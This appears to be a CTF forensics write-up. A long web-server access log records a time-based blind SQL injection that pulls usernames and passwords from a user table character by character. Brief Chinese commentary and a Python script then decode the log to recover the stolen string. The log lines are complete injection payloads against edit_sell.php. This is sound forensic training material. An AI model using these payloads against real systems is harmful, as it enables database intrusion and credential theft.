172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=59,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=60,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=61,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=62,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=63,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=64,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=65,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=66,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=67,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=68,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=69,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=70,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=71,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=72,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=73,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=74,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=75,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=76,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=77,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=78,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=79,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=80,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=81,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=82,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=83,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=84,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=85,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=86,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=87,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=88,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=89,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=90,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=91,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=92,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=93,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=94,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=95,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=96,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=97,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=98,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=99,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=100,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=101,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=102,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=103,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=104,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=105,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=106,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=107,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=108,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=109,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=110,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:26 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=111,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=40,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=41,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=42,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=43,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=44,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=45,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=46,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=47,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=48,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=49,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=50,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=51,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=52,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=53,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=54,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=55,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=56,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=57,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=58,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=59,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=60,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=61,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=62,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=63,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=64,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=65,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=66,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=67,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=68,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=69,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=70,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=71,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=72,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=73,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=74,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=75,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=76,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=77,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),3,1))=78,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:29 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-

看起来是sql注入日志,盲注类型,而且已经是注入在最后一步,获取字段内容了

可以从日志里提取注入信息

编写脚本:

import urllib.parse
f = open(".\\txt\\access.txt","r").readlines()
s = []
for i in range(0,3523):
	data = urllib.parse.unquote(f[i])#url解码
	payload = data.split("or")[2]#截取and后面的字符
	number = payload.find("from user),")#确定大概的位置
	data1 = payload[number+ 11:].split(",")[0]#取第一个数据
	data2 = payload[number + 11:].split("=")[1].split(",")[0]#取>后的数据
	s.append([data1,data2])
	

#转码输出
for i in range(1,len(s)):
    if (s[i][0] != s[i-1][0]):
       print(chr(int(s[i-1][1])),end="")#输出变化前的最后一个字符

你可能感兴趣的:(CTF,android,网络,算法,安全,网络安全,系统安全,web安全)